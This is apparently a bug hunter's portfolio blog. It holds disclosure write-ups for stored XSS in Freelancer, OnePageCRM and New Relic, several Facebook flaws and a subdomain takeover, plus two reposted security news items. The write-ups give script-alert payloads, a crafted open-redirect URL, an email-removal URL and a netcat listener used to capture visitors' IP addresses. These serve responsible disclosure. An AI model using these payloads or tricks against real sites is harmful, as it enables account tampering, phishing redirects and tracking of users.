ABOUT ME

My First Strategy is committed to providing you the best service.

MY SKILLS

I pride myself with strong, flexible and top notch skills.

Pentesting

Xss 85%
Broken Authentications 80%
Server-Side Vulnerabilities 70%

Web Developing

PHP 90%
HTML 85%
Css/Javascript 80%

Web Designing

Freindly User Interface 90%
SEO 80%
Responsive Page Design 85%

STRATEGY & CREATIVITY

I work With Full Attention So that i Suceeded in My Every JOB.

Pentesting Blog

I pride MySelf on bringing fresh Exploits and effective Vulnrabilities.

  • Stored Xss in Freelancer

    Hello Guys.Hope You are Doing Well Today i am Just Disclosing my Recent Finding on Bugcrowd.I just Founded Stored Xss Vulnerability in Main Domain of Freelancer i.e,
    http://www.freelancer.com/

    I Just Reported it and Got Nice Freelancer Swag and Some Kudos I am Also expecting  Reward From Them But AnyWay.


    So, Lets Move on Towards the PoC of My Submission

    POC:-

    1. Login
    2. Go to the Profile and Click Edit
    3. in Bio Section add the Simple Xss Payload i.e,
    4.    "><script>alert(1);</script>
    5. Click Save
    6. Open Profile in New Tab
    7. XSS ! BOOM 

     Watch Video PoC:- 




    Report Summary:-

    Submission created
    2017-03-30 13:31:50 UTC

    State changed
    2017-03-31 06:29:04 UTC
    Freelancer Engineer changed state to resolved

    Freelancer Engineer Rewarded You With Swag 

    Thanks,
    Abdulwahab
  • Facebook Bugs | By Hacker Wahab


    Aslam-O-Alaikum(Hello) Guys Here I am this post Contain all the Bugs I Have Founded in Facebook.

    1.Open Redirect & Content Spoofing

    Vulnerability Type
    Open Redirector
    Vulnerability Scope
    Mobile Site or App
    Title
    Open Redirect & Content Spoofing
    Description and Impact
    Hi,

    after Getting A Lots of Low Impact i Come back with an Open Redirector issue.
    Reproduction Instructions/Proof of Concept
    In the Reporting Section of Facebook all the Sensitive options is Disclose on UrL:-
    https://mbasic.facebook.com/nfx/basic/question/?context_str=%7B%22initial_action_name%22%3A%22REPORT_CONTENT%22%2C%22breadcrumbs%22%3A%5B%22offensive%22%2C%22hatespeech%22%2C%22religious%22%5D%2C%22story_location%22%3A%22page%22%2C%22is_from_feed_tombstone%22%3Afalse%2C%22actions_taken%22%3A%22%22%2C%22is_rapid_reporting%22%3Afalse%2C%22reportable_ent_token%22%3A%222237869389770846%22%2C%22is_impostor%22%3A%22%22%7D&redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F&prev_action_info=%7B%22action_name%22%3A%22UNSUBSCRIBE%22%2C%22completed_title%22%3A%22Posts+from+%5Cu200e%5Cu0645%5Cu0648%5Cu0644%5Cu0648%5Cu06cc+%5Cu0628%5Cu0631%5Cu0642%5Cu0639%5Cu06c1%5Cu200e+hidden%22%2C%22completed_subtitle%22%3A%22Poc+is+of+OPEN+REDIRECT+AND+CONTENT+SPOOFING.%22%7D&av=100015350014851&_rdr

    After redirect_uri= we can add vuln web like i added in above url and after Completed_Subtitle you can add Content Spoofing Text.

    As We interested in open redirect Click Done Then in Survey They Ask Community Stars Give Them Than Click Next then Click Submit a new page Open With Vulnerable URL
    Video PoC:-
    https://youtu.be/oFTKN7WWvQs
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    2.Delete Primary Email(Which is Unallowed by Facebook)

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    Delete Primary Email(Which is Unallowed by Facebook)
    Description and Impact
    Hi,
    My Self Abdulwahab.

    As You Know That there is no way to delete an Primary Email But i found an indirect way to Delete an Primary Email.
    Reproduction Instructions/Proof of Concept
    As You can see on {POC 1.png} that there is no way to delete Primary.In Mobile site there is also no way
    We can use this url:-
    https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

    to Remove primary Email.
    When u Open The Link Account Primary email Deleted as in (POC 2.png)
    As i cannot upload video here so i use Youtube
    Video PoC( Prv8 ):-
    https://youtu.be/BUG1PLnCJjw
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    3.Change Account Password Without Knowing Current Password


    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Main Site (www.facebook.com)
    Title
    Change Account Password Without Knowing Current Password
    Description and Impact
    Hi,
    My name is ABDULWAHAB,I am Writing This to you because i think i can change a Fb Account password of a logged-in Account Without knowing Current Password.
    Reproduction Instructions/Proof of Concept
    1.Go to Settings
    2.On Mobile add a Mobile Number u have access ( Enter You Mobile Number)
    3.Logout
    4.Click Forget Password
    5.Enter Your Mobile Number you recently Added.
    6.U Receive Code enter it
    7.enter New Password And DONE!

    As You See in all Procedure i dont Use Current Password and Account Password Changed

    Fix Suggestion:-
    ask current Password Field in adding a New Phone number

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?

    4.Ip Steal Using Content Injection

    Manually / Other
    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    Ip Steal Using Content Injection
    Description and Impact
    Hi.

    I Founded an Content Injection issue on mobile site of Facebook.But it has Low impact so i try to increase Risk of Vulnerability so I found a Serious Problem IP STEAL.
    Reproduction Instructions/Proof of Concept
    1.Open Kali Linux terminal
    2.Command to Listen on Port
    nc -lvnp 1337 u can use any port
    3.Login in to Facebook Account
    4.Use this Port with YourIp In Such Way:-
    https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=http://192.168.1.16:1337/&free_days=25555
    5.When User Opens This Page Ip is Captured.
    Video Poc:-
    https://youtu.be/g2naYvWm4j0
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    5.Content Spoofing

    Vulnerability Type
    Other Vulnerability
    Vulnerability Scope
    Mobile Site or App
    Title
    Content Injection
    Reproduction Instructions/Proof of Concept
    1. goto Deactivate account
    2. Choose any Condition
    3.Click Deactivate
    4.Now You see an add
    5.Customize it by using its uRL

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    Video PoC(ALL BUGS):-


  • Sub_Domain TakeOver iwantmyname


    Aslam-O-Alaikum,

    Brothers and their Sisters.Today i am Going to Disclose my recent Findings on Iwantmyname(BugCrowd).
    According to This Issue I am Able to Fully Takeover a Sub_domain.

    Tool Used:-
    Knockpy ( A python Sub_Domain Finder)

    PoC:-
  • I just Founded a Sub Domain That is Created With Domain iwantmyname.com
    This SubDomain Contains The Nameserver's and DNS Recored of WpEngine But It is not linked with any account of Wp_engine.
  • Replication Steps
    1.Go to Wpengine.com
    2.Buy a Membership
    3.Add domain
    http://an.iwantmyname.com/
    4.Done
    Sub_domain Is Now Of Attacker.

  • Reward : Kudos

  • President Donald Trump's Website Hacked; Defaced By Iraqi Hacker

    During the 2016 presidential election campaign, we reported about how insecure was the mail servers operated by the Trump organization that anyone with little knowledge of computers can expose almost everything about Trump and his campaign.

    Now, some unknown hackers calling themselves "Pro_Mast3r" managed to deface an official website associated with President Donald Trump's presidential campaign fundraising on Sunday.

    The hacker, claiming to be from Iraq, reportedly defaced the server, secure2.donaldjtrump.com, which is behind CloudFlare's content management system and security platform.

    The server appears to be an official Trump campaign server, reported Ars, as the certificate of the server is legitimate, "but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure."

    The defaced website displayed an image of a black hat man and included a text message, which reads:
    Hacked by Pro_Mast3r ~
    Attacker Gov
    Nothing Is Impossible
    Peace From Iraq

    Instead, the server includes a link to javascript on a now-nonexistent Google Code account, 'masterendi,' which was linked to cyber attacks on three other sites in the past.

  • A Simple JavaScript Exploit Bypasses ASLR Protection On 22 CPU Architectures




    Here's How the attack works:

    The attack exploits the way microprocessors and memory interacts with each other.

    MMU, which is present in desktop, mobile and server chips and tasks to map where a computer stores programs in its memory, constantly checks a directory called a page table to keep track of those addresses.

    Devices usually store the page table in the CPU’s cache which makes the chip speedier and more efficient. But this component also shares some of its cache with untrusted applications, including browsers.
    Therefore, a piece of javascript code running on a malicious website can also write to that cache (side channel attack), allowing attackers to discover where software components, like libraries and RAM-mapped files, are located in virtual memory.

    With these location data in hands, any attacker can read portions of the computer's memory, which they could then use to launch more complex exploits, escalate access to the complete operating system, and hijack a computer system.

    The researchers successfully exploited AnC JavaScript attacks via up-to-date Chrome and Firefox web browsers on 22 different CPU micro-architectures in about 90 seconds, even despite ASLR protections built within those browsers, like broken JavaScript timers.

    The VUSec research team have published two research papers [1, 2] detailing the AnC attack, along with two video demonstration showing the attack running in a Firefox browser on a 64-bit Linux machine.
    In their attack, the researchers combined their AnC JavaScript with attack code that exploits a now-patched use-after-free vulnerability (CVE-2013-0753) in Firefox. Issues with AnC attacks are tracked through several CVE identifiers, including:
    • CVE-2017-5925 for Intel processors
    • CVE-2017-5926 for AMD processors
    • CVE-2017-5927 for ARM processors
    • CVE-2017-5928 for a timing issue affecting multiple browsers
    VUSec team already notified all the affected chipmakers and software firms, including Intel, AMD, Samsung, Nvidia, Microsoft, Apple, Google, and Mozilla, more than three months ago, but only now went public with their findings.
    "The conclusion is that such caching behavior and strong address space randomization are mutually exclusive," the paper concludes. "Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical." 
    "Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as the first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block."
    According to the team, the only way you can protect yourself against AnC attacks is to enable plug-ins, such as NoScript for Firefox or ScriptSafe for Chrome, to block untrusted JavaScript code on web pages from running in the browser.

    CopyRight: The Hacker News
  • Stored Xss in OnePageCrm


    Aslam-O-Alaikum,

    Friends,Hope You all are Fine.Today i am Going to Share the PoC of Stored Xss i Recently Founded in
    OnepageCrm.

    OnepageCrm:

    OnePageCRM is a simple online sales CRM for small business. Focus on your Next Action to easily convert leads into customers and grow your business.

    Summary Of Report
  • Submitted: 2016-11-20 15:33:41 UTC
  • State changed to resolved :2016-11-29 13:00:26 UTC
  • While Testing OnePageCrm I Oberved that Signup Field(Address Field) 
    Is Vulnerable to Xss so i try That and it Popup with my happiness.

    1.Signup with Contact Name in Address Field Below:-
    <script>alert(1);</script>
    2.Login with account
    3.Xss Executed

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,


  • Stored Xss in New Relic

    Stored Xss in New Relic

    About New_Relic:-

    Offers a performance management solution enabling developers to diagnose and fix application performance problems in real time.


     Here is The PoC:-



    Hello, My Self ABDULWAHAB
    Today I Founded a Stored Xss in rpm.newrelic.com
    1.Open Newrelic.com
    2.Register a new account But In Company add Xss Code <script>alert('XSS BY ABDULWAHAB');</script>
    3.Complete Signup
    4.Xss Code Executed
    Watch The Video Below
    Thanks,
    ABDULWAHAB
    Tested On:-
    OS: Windows 8.1
    Browser: Chrome

    POC Video:-


    • Powered by Blogger.

      CONTACT ME

      For enquiries you can contact M in several different ways. Contact details are below.

      ABDULWAHAB

      • Meet-Up :Lahore,Pakistan
      • Phone :+92 3164970878
      • Country :PAKISTAN
      • Email :hackertabish786@gmail.com